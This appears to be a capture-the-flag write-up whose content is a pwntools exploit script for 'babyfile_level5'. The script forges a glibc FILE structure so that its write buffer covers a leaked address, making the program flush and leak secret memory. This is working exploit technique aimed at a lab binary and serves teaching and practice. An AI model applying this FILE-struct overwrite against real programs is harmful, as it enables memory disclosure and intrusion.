(File Struct Exploits) level 5
(File Struct Exploits) level 5
Information
- category: pwn
Description
Abuse built-in FILE structs to leak sensitive information.
Exploit
from pwn import *
# Load the challenge binary and register it as the pwntools context binary,
# so pwntools works with this ELF's settings by default.
elf = ELF("/challenge/babyfile_level5")
context.binary = elf

# Start the target at import time; exploit() talks to this tube.
# (A `global` statement at module scope has no effect, so it is omitted here:
# `p` is already a module-level name.)
p = elf.process()
def exploit():
    """Send a partial FILE struct whose write buffer spans the announced address.

    Reads the hex address the target prints after "located at ", builds a
    FileStructure whose write-buffer pointers cover 0x64 bytes starting at
    that address, sends the struct bytes up to and including `_IO_write_end`,
    and then hands the tube over to the terminal.

    NOTE(review): presumably the challenge reads these bytes over one of its
    own FILE objects and later writes through it, so the next flush emits the
    range [_IO_write_base, _IO_write_ptr). That side is not visible in this
    script; confirm against the challenge source. The underlying flaw is
    untrusted input being able to overwrite a live FILE object.
    """
    # The target prints the address as hex text terminated by a newline.
    p.recvuntil(b"located at ")
    address_line = p.recvline()
    secret_addr = int(address_line[:-1], 16)  # [:-1] drops the trailing newline
    window_end = secret_addr + 0x64

    forged = FileStructure()
    # 0xFBAD0000 is glibc's _IO_MAGIC; 0x0800 is _IO_CURRENTLY_PUTTING and
    # 0x1000 is _IO_IS_APPENDING. Together they equal 0xFBAD1800.
    forged.flags = 0xFBAD0000 | 0x0800 | 0x1000
    # Pending output is the range write_base..write_ptr; write_end is set to
    # the same upper bound as write_ptr.
    forged._IO_write_base = secret_addr
    forged._IO_write_ptr = window_end
    forged._IO_write_end = window_end

    # struntil() serialises the struct from its start through the named member,
    # leaving every later field of the target's FILE object untouched.
    partial_struct = forged.struntil("_IO_write_end")
    p.send(partial_struct)
    p.interactive()
def main():
    """Script entry point: run the single exploit routine."""
    exploit()
# Run main() only when this file is executed as a script, not when imported.
if __name__ == "__main__":
    main()
This post is licensed under CC BY 4.0 by the author.